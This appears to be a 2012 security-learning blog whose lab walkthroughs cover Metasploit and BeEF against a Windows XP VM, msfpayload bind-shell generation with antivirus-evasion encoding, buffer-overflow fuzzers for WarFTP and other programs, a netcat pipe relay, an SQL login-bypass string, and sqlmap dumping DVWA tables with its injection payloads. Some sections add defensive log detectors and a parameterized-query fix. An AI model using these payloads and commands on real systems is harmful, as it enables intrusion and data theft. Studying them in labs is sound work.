This article is about exploitation using BeEF (Browser Exploitation Framework) and Metasploit. Here I use Windows XP SP3 (in VirtualBox) as the victim. First I make a payload using Metasploit, then try to send a link to the victim; the link goes to a web page with BeEF embedded in it. Then run BeEF.
Wednesday, 29 February 2012
Monday, 27 February 2012
work with metasploits and beef
This article is about exploitation using Metasploit and BeEF. First, exploit the victim (XP SP3) using Metasploit.
I use the payload vncinject/reverse_tcp; that is risky, so you must wait until the victim is asleep (away from the machine).
Then I explore the system: I run Mozilla Firefox and set its home page to the address where I put a page with BeEF embedded in it. Because I did not have much time (my VirtualBox was giving errors) I used the example file that comes with BeEF.
Then run BeEF and wait for the victim to open Mozilla Firefox.
Then check the BeEF panel.
Timeout...
I'll continue next time.
Metasploit Auxiliary Modules
Metasploit has many auxiliary modules; one of them is ftp_version, which shows the version of the FTP server running on the target. To use it:
First, run msfconsole.
Then run the command show auxiliary, which lists all auxiliary modules.
Then load the module with the command use scanner/ftp/ftp_version.
Then run the command show options, which shows the options of the ftp_version module.
It shows that ftp_version requires the target address to identify, the FTP port on the target, and the number of threads; the defaults are port 21 and 1 thread.
Then set the IP address of the target; here I use 192.168.56.101, the IP of the XP VM in VirtualBox on my computer.
Then run.
The result shows the version of the FTP server running on the target (192.168.56.101).
Social Engineering and the Social Engineering Toolkit (SET)
Social Engineering is the practice of learning and obtaining valuable information by exploiting human weaknesses: a deception in which an attacker gets information by simply asking for it, from the victim directly or from other people who have it. Social engineering works because we are social creatures, and our nature makes us vulnerable to social engineering attacks; that makes people the weakest link in the security defenses of a computer network.
The Social Engineering Toolkit is a package designed to help carry out social engineering. It helps prepare the most effective way of exploiting client-side application vulnerabilities and makes a convincing attempt to capture the target's confidential information (for example, e-mail passwords). Some of the most efficient and useful attack methods employed by SET include targeted phishing e-mails with a malicious file attachment, Java applet attacks, browser-based exploitation, gathering website credentials, creating infectious portable media, mass-mailer attacks, and other similar multi-attack web vectors. This combination of attack methods provides a powerful platform for selecting the most persuasive technique for an advanced attack against the human element.
MSFpayload and MSFencode
MSFpayload
msfpayload is a component of the Metasploit Framework that can be used to generate shellcode, executables, and much more for use in exploits outside of the Framework. Shellcode can be generated in many formats including C, Ruby, JavaScript, and even Visual Basic for Applications.
An example of using msfpayload:
root@bt:/#msfpayload windows/shell_bind_tcp LPORT=4444 X > /sharefolder/evil.exe
This command makes a payload of type shell_bind_tcp. It works when the target runs the evil.exe file; the attacker can then run nc to open a connection to the target on port 4444.
Metasploit has many types of payloads.
MSFencode
MSFencode is a component of the Metasploit Framework. It is used to avoid bad characters when we generate a payload, and also to bypass antivirus and IDS (intrusion detection systems). When we generate a payload with msfpayload, the result can include bad characters, and those bad characters can break your payload. Metasploit has several encoders, such as shikata_ga_nai.
An example of using MSFencode is shown below:
It makes a reverse shell payload and encodes it with the shikata_ga_nai encoder.
Friday, 24 February 2012
Buffer Overflow Exploits - Linux
This article is a step-by-step buffer overflow exploit on Linux.
First, turn off Linux ASLR (Address Space Layout Randomization).
Then make a vulnerable application:
#include <stdio.h>
#include <string.h>

int main(int argc, char **argv)
{
    char buffer[500];
    if (argc < 2)
        return 1;                /* one argument is required */
    strcpy(buffer, argv[1]);     /* Vulnerable function: no length check, a long argv[1] overflows buffer */
    return 0;
}
Wednesday, 22 February 2012
Buffer Overflow Exploits - File Sharing Wizard
First I use Wireshark to sniff the File Sharing Wizard traffic between BackTrack and the VirtualBox VM.
Friday, 17 February 2012
Exploits Big Ant Server
This article is about everything I did to exploit Big Ant Server. Big Ant Server offers secure instant messaging, file transfer, VoIP, video chat, web conferencing and more. Before starting you must know what SEH and SafeSEH are, because this exploit is tied to them. SEH (Structured Exception Handling) is a mechanism, in software and hardware, for handling exceptions; an exception is raised when an application tries to execute code outside its normal code path. SafeSEH is a linker option usually set by the programmer when compiling an application; it keeps a table of the registered SEH handler addresses in the module.
Tuesday, 14 February 2012
Buffer Overflow Exploits - VUPlayer
This article is about what I did when trying to exploit VUPlayer. First, install VUPlayer in VirtualBox; after the install finished, I opened VUPlayer to get to know it.
Sunday, 12 February 2012
Buffer Overflow Local Exploits
This article is about buffer overflow exploits; in this post I try to exploit the RM-to-MP3 converter. First I make a fuzzer file named mawarmerah.pls that contains a long URL. The script that makes the fuzzer file is below:
#!/usr/bin/python
filename = "malamterakhir.pls"
hancur = 'http://'
hancur += '\x41' * 35000        # 35000 'A's after the scheme: the oversized URL
file = open(filename, 'w')
file.write(hancur)
print("hancurkan rek")
file.close()
Sunday, 5 February 2012
installation warFTP
To install WarFTP you must have the WarFTP installer, which you can download here
1. Extract the WarFTP file
2. Click setup.exe
3. Choose the location to install to
Fuzzing and Fuzzer
A fuzzer is a tool used by security professionals (and professional hackers :) to test the parameters of an application. Typical fuzzers test an application for buffer overflows, format string vulnerabilities, and error handling. More advanced fuzzers incorporate functionality to test for directory traversal attacks, command execution vulnerabilities, SQL injection and Cross Site Scripting vulnerabilities. Web vulnerability scanners typically perform all of this functionality, and can be considered advanced fuzzers.
Buffer Overflow WarFTP Application
First make a fuzzer application in Python:
#!/usr/bin/python
import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
buffer = b"\x41" * 1000                  # 1000 'A's as the USER argument
s.connect(('192.168.43.2', 21))          # the WarFTP server in the VM
data = s.recv(1024)                      # read the 220 banner first
print("sending evil data via USER command...")
s.sendall(b'USER ' + buffer + b'\r\n')
s.close()
print("Finish")
Then run OllyDbg and open war-ftp.exe.
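The fuzzer above and the "Fuzzing and Fuzzer" note describe the attacker's side: an oversized, repetitive USER argument. On the server side the same probe is visible in the FTP command log. The following is an added example (not code from the original post) that applies two heuristics to constructed log lines: an argument longer than a tuning threshold, and a long run of a single byte. The log layout (timestamp, client IP, command, argument) is an assumption for the example, not any particular FTP server's real format.

```python
"""Flag fuzzing / overflow probes in an FTP command log (constructed sample)."""
import re
from collections import Counter

# FTP user names and paths are normally short. RFC 959 sets no limit, so the
# threshold is a tuning choice for this example.
MAX_ARG_LEN = 128

# Constructed sample: one normal session, then one fuzzing attempt of
# 1000 'A's, like the fuzzer in the post.
SAMPLE_LOG = """\
2012-02-05 10:01:02 192.168.43.5 USER anonymous
2012-02-05 10:01:02 192.168.43.5 PASS guest@example.org
2012-02-05 10:01:03 192.168.43.5 CWD /pub
2012-02-05 10:02:10 192.168.43.9 USER """ + "A" * 1000 + """
2012-02-05 10:02:11 192.168.43.9 USER admin
"""

# Assumed layout: "<date> <time> <client ip> <COMMAND> [argument]"
LINE_RE = re.compile(
    r"^(?P<ts>\S+ \S+) (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) "
    r"(?P<cmd>[A-Za-z]{3,4})(?: (?P<arg>.*))?$"
)


def parse_line(line):
    """Split one log line into its fields; None if the line does not fit."""
    m = LINE_RE.match(line.rstrip("\n"))
    return m.groupdict() if m else None


def dominant_char_ratio(s):
    """Fraction of the string made up of its single most common character."""
    if not s:
        return 0.0
    return Counter(s).most_common(1)[0][1] / len(s)


def classify(arg):
    """Return the heuristics an argument trips (empty list means benign)."""
    reasons = []
    if len(arg) > MAX_ARG_LEN:
        reasons.append("oversize argument (%d bytes)" % len(arg))
    # A long run of one byte is the classic overflow probe ("A" * N).
    if len(arg) >= 32 and dominant_char_ratio(arg) > 0.9:
        reasons.append("repeated-byte filler")
    if any(ord(c) < 0x20 or ord(c) > 0x7e for c in arg):
        reasons.append("non-printable bytes")
    return reasons


def scan_log(text):
    """Return (client ip, command, reasons) for every suspicious line."""
    findings = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        reasons = classify(rec["arg"] or "")
        if reasons:
            findings.append((rec["ip"], rec["cmd"].upper(), reasons))
    return findings


if __name__ == "__main__":
    for ip, cmd, reasons in scan_log(SAMPLE_LOG):
        print("%s %s: %s" % (ip, cmd, "; ".join(reasons)))
```

Only the 1000-byte USER line is reported; it trips both the size and the repeated-byte heuristics, while the short user names and the path pass through untouched.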
olly debugger
Before I explain OllyDbg you must know what a debugger is: a debugger is a special program used to find errors (bugs) in other programs, and OllyDbg is one such debugger.
OllyDbg is an x86 debugger that emphasizes binary code analysis, which is useful when source code is not available. It traces registers, recognizes procedures, API calls, switches, tables, constants and strings, and locates routines from object files and libraries.
OllyDbg is often used for reverse engineering of programs. It is often used by crackers to crack software made by other developers. For cracking and reverse engineering it is often the primary tool because of its ease of use and availability. It is also useful for programmers to check that their program runs as intended.
Register Structure
Registers are a part of processor memory that can be accessed at high speed and are always used by the microprocessor as an intermediary in doing its work.
Registers are divided into:
- General Purpose Registers
- Pointer and Index Registers
- Segment Registers
- Flag Register
1. General Purpose Registers
These are 16-bit registers, consisting of AX, BX, CX and DX.
2. Pointer and Index Registers
Registers used as a pointer to a location in memory. In 16-bit mode they consist of SP (Stack Pointer), BP (Base Pointer), SI (Source Index), DI (Destination Index), and IP (Instruction Pointer).
3. Segment Registers
16-bit registers that record an address as a marker of a data location in memory. They consist of SS (Stack Segment), CS (Code Segment), DS (Data Segment), and ES (Extra Segment).
4. Flag Register
A 1-bit register that indicates the condition of a state (yes/no or 0/1).
Wednesday, 1 February 2012
nc using mkfifo
Netcat is an incredibly useful tool that lets you play with TCP connections easily from the shell.
Basically, as its name implies, it's just cat over the network, but what its name doesn't tell you is that it can also act as a socket listener.
So let's play with pipes; here is one of my favourite uses of netcat:
# mkfifo proxypipe
# cat proxypipe | nc -l -p 80 | tee -a inflow | nc localhost 81 | tee -a outflow 1>proxypipe
This command redirects traffic from localhost:80 to localhost:81; in the inflow file you will find the incoming HTTP request, and in the outflow file you will find the HTTP response from the server.
Similarly, you can do this:
cat proxypipe | nc -l 80 | tee -a inflow | sed 's/^Host.*/Host: www.target.fr/' | nc www.target.fr 80 | tee -a outflow >proxypipe
Bypassing the username and password in a login form
First, to practice, open localhost/fbip in your browser.
Then type ' or '1'='1'# in the form, and the admin page opens:
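The login bypass above works because the form value is pasted into the SQL text, so the quote closes the string and the rest becomes SQL. Below is an added example (not code from the original post, and not the fbip application) showing the vulnerable query construction next to the parameterized version that defeats it, against a throw-away in-memory SQLite table that stands in for the login database. The page's payload ends in '#', MySQL's comment marker; SQLite does not accept '#', so the constructed payload here is the bare tautology placed in the password field, which works on any engine.

```python
"""Login-form SQL injection: string-built query vs. parameterized query."""
import sqlite3


def make_db():
    """Constructed fixture: an in-memory users table with one account."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, role TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 's3cret', 'admin')")
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """The pattern the page's trick defeats: user input pasted into the SQL text."""
    sql = ("SELECT role FROM users WHERE username = '%s' AND password = '%s'"
           % (username, password))
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    """Same query with bound parameters: the input is data, never SQL."""
    sql = "SELECT role FROM users WHERE username = ? AND password = ?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row[0] if row else None


# Constructed attacker input for the password field. The vulnerable query
# becomes  ... WHERE username = 'admin' AND password = '' OR '1'='1'
# which is true for every row because AND binds tighter than OR.
TAUTOLOGY = "' OR '1'='1"


def demo():
    """Run both versions against the fixture and return their results."""
    conn = make_db()
    return {
        "vulnerable": login_vulnerable(conn, "admin", TAUTOLOGY),  # 'admin'
        "safe": login_safe(conn, "admin", TAUTOLOGY),              # None
        "real_login": login_safe(conn, "admin", "s3cret"),         # 'admin'
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print("%-10s -> %r" % (name, result))
```

The parameterized version compares the password column against the literal string "' OR '1'='1", finds no such row, and rejects the login; the real credentials still work, so nothing is lost by the fix.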
SQL injection in localhost/dvwa
First open localhost/dvwa in your browser:
Then click the SQL Injection menu and enter 1 in the id field; DVWA shows the following:
Then open sqlmap and type this command:
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=snncv5o9prk5au40rf5m30fjn2" --string="Surname" --dbs
Below is part of the result of that command:
Then type the command:
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=snncv5o9prk5au40rf5m30fjn2" -D dvwa --tables
sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.
[*] starting at: 11:52:34
[11:52:34] [INFO] using '/pentest/database/sqlmap/output/localhost/session' as session file
[11:52:34] [INFO] resuming injection data from session file
[11:52:34] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[11:52:34] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 1935=1935 AND 'vLTC'='vLTC&Submit=Submit
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=1' AND (SELECT 3719 FROM(SELECT COUNT(*),CONCAT(CHAR(58,98,102,100,58),(SELECT (CASE WHEN (3719=3719) THEN 1 ELSE 0 END)),CHAR(58,110,101,105,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'Smid'='Smid&Submit=Submit
Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: id=1' UNION ALL SELECT CONCAT(CHAR(58,98,102,100,58),IFNULL(CAST(CHAR(65,118,104,113,75,114,112,72,106,97) AS CHAR),CHAR(32)),CHAR(58,110,101,105,58)), NULL# AND 'Cbmh'='Cbmh&Submit=Submit
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=1' AND SLEEP(5) AND 'BJNX'='BJNX&Submit=Submit
---
[11:52:34] [INFO] manual usage of GET payloads requires url encoding
[11:52:34] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0
[11:52:34] [INFO] fetching tables for database: dvwa
Database: dvwa
[2 tables]
+-----------+
| guestbook |
| users |
+-----------+
[11:52:35] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/localhost'
[*] shutting down at: 11:52:35
Then type this command:
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=snncv5o9prk5au40rf5m30fjn2" -T users -C user_id --dump
sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.
[*] starting at: 11:56:20
[11:56:20] [INFO] using '/pentest/database/sqlmap/output/localhost/session' as session file
[11:56:20] [INFO] resuming injection data from session file
[11:56:20] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[11:56:20] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 1935=1935 AND 'vLTC'='vLTC&Submit=Submit
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=1' AND (SELECT 3719 FROM(SELECT COUNT(*),CONCAT(CHAR(58,98,102,100,58),(SELECT (CASE WHEN (3719=3719) THEN 1 ELSE 0 END)),CHAR(58,110,101,105,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'Smid'='Smid&Submit=Submit
Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: id=1' UNION ALL SELECT CONCAT(CHAR(58,98,102,100,58),IFNULL(CAST(CHAR(65,118,104,113,75,114,112,72,106,97) AS CHAR),CHAR(32)),CHAR(58,110,101,105,58)), NULL# AND 'Cbmh'='Cbmh&Submit=Submit
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=1' AND SLEEP(5) AND 'BJNX'='BJNX&Submit=Submit
---
[11:56:20] [INFO] manual usage of GET payloads requires url encoding
[11:56:20] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0
[11:56:20] [WARNING] missing database parameter, sqlmap is going to use the current database to enumerate table(s) entries
[11:56:20] [INFO] fetching current database
do you want to use LIKE operator to retrieve column names similar to the ones provided with the -C option? [Y/n] y
[11:56:23] [INFO] fetching columns LIKE 'user_id' for table 'users' on database 'dvwa'
[11:56:23] [INFO] fetching column(s) 'user_id' entries for table 'users' on database 'dvwa'
Database: dvwa
Table: users
[5 entries]
+---------+
| user_id |
+---------+
| 1 |
| 3 |
| 2 |
| 5 |
| 4 |
+---------+
[11:56:23] [INFO] Table 'dvwa.users' dumped to CSV file '/pentest/database/sqlmap/output/localhost/dump/dvwa/users.csv'
[11:56:23] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/localhost'
[*] shutting down at: 11:56:23
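Every injection point sqlmap listed above (the boolean-based AND 1935=1935, the error-based query against INFORMATION_SCHEMA, the UNION ALL SELECT, and the time-based SLEEP(5)) travels in the id parameter, URL-encoded, so the defender sees all of them in the web server's access log. The following added example (not code from the original post or from sqlmap) rebuilds those requests as constructed Apache combined-format lines, decodes the query string, and matches the decoded values against signatures for those four techniques plus the tautology from the fbip section. The User-Agent value is constructed from sqlmap's banner on the page; sqlmap's default User-Agent starts with "sqlmap/", but since a tester can override it, the query signatures are the primary check.

```python
"""Spot sqlmap-style injection probes in a web access log (constructed sample)."""
import re
from urllib.parse import urlsplit, parse_qsl, quote

# Apache "combined" log format.
ACCESS_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# One signature per technique seen in the sqlmap output above, applied to
# the decoded parameter values.
SIGNATURES = [
    ("boolean tautology", re.compile(r"\bAND\s+(\d+)\s*=\s*\1\b", re.I)),
    ("quoted tautology", re.compile(r"'\s*OR\s*'[^']*'\s*=\s*'", re.I)),
    ("union select", re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I)),
    ("time-based", re.compile(r"\b(?:SLEEP|BENCHMARK)\s*\(", re.I)),
    ("schema probe", re.compile(r"\bINFORMATION_SCHEMA\b", re.I)),
]

# Constructed from the banner in the post; sqlmap's default UA has this shape.
SQLMAP_UA = "sqlmap/1.0-dev (http://sqlmap.sourceforge.net)"
BASE = "/dvwa/vulnerabilities/sqli/?id=%s&Submit=Submit"


def make_line(ip, id_value, ua):
    """Build one constructed combined-format line, URL-encoding the id value."""
    target = BASE % quote(id_value, safe="")
    return ('%s - - [01/Feb/2012:11:52:34 +0700] "GET %s HTTP/1.1" 200 4522 '
            '"-" "%s"' % (ip, target, ua))


# The id values are the payloads sqlmap printed above (minus &Submit=Submit).
SAMPLE_LOG = "\n".join([
    make_line("192.168.56.1", "1", "Mozilla/5.0 (X11; Linux i686) Firefox/10.0"),
    make_line("192.168.56.1", "1' AND 1935=1935 AND 'vLTC'='vLTC", SQLMAP_UA),
    make_line("192.168.56.1", "1' AND (SELECT 3719 FROM(SELECT COUNT(*),"
              "CONCAT(CHAR(58,98,102,100,58),(SELECT (CASE WHEN (3719=3719) "
              "THEN 1 ELSE 0 END)),CHAR(58,110,101,105,58),FLOOR(RAND(0)*2))x "
              "FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'Smid'='Smid",
              SQLMAP_UA),
    make_line("192.168.56.1", "1' UNION ALL SELECT NULL,NULL# AND 'Cbmh'='Cbmh", SQLMAP_UA),
    make_line("192.168.56.1", "1' AND SLEEP(5) AND 'BJNX'='BJNX", SQLMAP_UA),
])


def parse_access_line(line):
    """Split a combined-format line into fields; None if it does not parse."""
    m = ACCESS_RE.match(line)
    return m.groupdict() if m else None


def inspect_request(rec):
    """Return [(parameter, [signature names])] for one parsed request."""
    hits = []
    query = urlsplit(rec["target"]).query
    for name, value in parse_qsl(query, keep_blank_values=True):  # %xx decoded here
        matched = [sig for sig, rx in SIGNATURES if rx.search(value)]
        if matched:
            hits.append((name, matched))
    if rec["ua"].lower().startswith("sqlmap/"):
        hits.append(("user-agent", ["sqlmap default User-Agent"]))
    return hits


def scan_access_log(text):
    """Return one finding per request that trips at least one signature."""
    findings = []
    for line in text.splitlines():
        rec = parse_access_line(line)
        if rec is None:
            continue
        hits = inspect_request(rec)
        if hits:
            findings.append({"ip": rec["ip"], "target": rec["target"], "hits": hits})
    return findings


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f["ip"], f["hits"])
```

The plain id=1 request produces no finding; the four sqlmap requests each match the signature for their technique, and all of them additionally carry the tool's User-Agent. Decoding before matching matters: in the raw log the payloads appear as %27%20AND%201935%3D1935, which none of the patterns would recognize.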
What is TOR
Tor is a network of virtual tunnels that allows people and groups to improve their privacy and security on the Internet. It also enables software developers to create new communication tools with built-in privacy features. Tor provides the foundation for a range of applications that allow organizations and individuals to share information over public networks without compromising their privacy.
Individuals use Tor to keep websites from tracking them and their family members, or to connect to news sites, instant messaging services, or the like when these are blocked by their local Internet providers. Tor's hidden services let users publish web sites and other services without needing to reveal the location of the site. Individuals also use Tor for socially sensitive communication: chat rooms and web forums for rape and abuse survivors, or people with illnesses.
Journalists use Tor to communicate more safely with whistleblowers and dissidents. Non-governmental organizations (NGOs) use Tor to allow their workers to connect to their home website while they're in a foreign country, without notifying everybody nearby that they're working with that organization.
Groups such as Indymedia recommend Tor for safeguarding their members' online privacy and security. Activist groups like the Electronic Frontier Foundation (EFF) recommend Tor as a mechanism for maintaining civil liberties online. Corporations use Tor as a safe way to conduct competitive analysis, and to protect sensitive procurement patterns from eavesdroppers. They also use it to replace traditional VPNs, which reveal the exact amount and timing of communication. Which locations have employees working late? Which locations have employees consulting job-hunting websites? Which research divisions are communicating with the company's patent lawyers?
A branch of the U.S. Navy uses Tor for open source intelligence gathering, and one of its teams used Tor while deployed in the Middle East recently. Law enforcement uses Tor for visiting or surveilling web sites without leaving government IP addresses in their web logs, and for security during sting operations.
The variety of people who use Tor is actually part of what makes it so secure. Tor hides you among the other users on the network, so the more populous and diverse the user base for Tor is, the more your anonymity will be protected.
Google Hacking
Google hacking is the use of a search engine, such as Google, to locate a security vulnerability on the Internet. There are generally two types of vulnerabilities to be found on the Web: software vulnerabilities and misconfigurations. Although there are some sophisticated intruders who target a specific system and try to discover vulnerabilities that will allow them access, the vast majority of intruders start out with a specific software vulnerability or common user misconfiguration that they already know how to exploit, and simply try to find or scan for systems that have this vulnerability.
Google is of limited use to the first attacker, but invaluable to the second.
When an attacker knows the sort of vulnerability he wants to exploit but has no specific target, he employs a scanner. A scanner is a program that automates the process of examining a massive quantity of systems for a security flaw. The earliest computer-related scanner, for example, was a war dialer: a program that would dial long lists of phone numbers and record which ones responded with a modem handshake.
About Shodan
SHODAN is a search engine that lets you find specific computers (routers, servers, etc.) using a variety of filters. Some have also described it as a public port scan directory or a search engine of banners.
Shodan is different from Google or Bing: it does not search the content of websites; it searches for specific computers. Are you interested in finding computers running a certain piece of software (such as Apache)? Do you want to know which version of Microsoft IIS is the most popular? Do you want to see how many anonymous FTP servers there are? Maybe a new vulnerability came out and you want to see how many hosts it could affect? Traditional web search engines don't let you answer those questions, but Shodan will.
Below is the first screen you see when you open shodanhq.com
And below is the result of a search using Shodan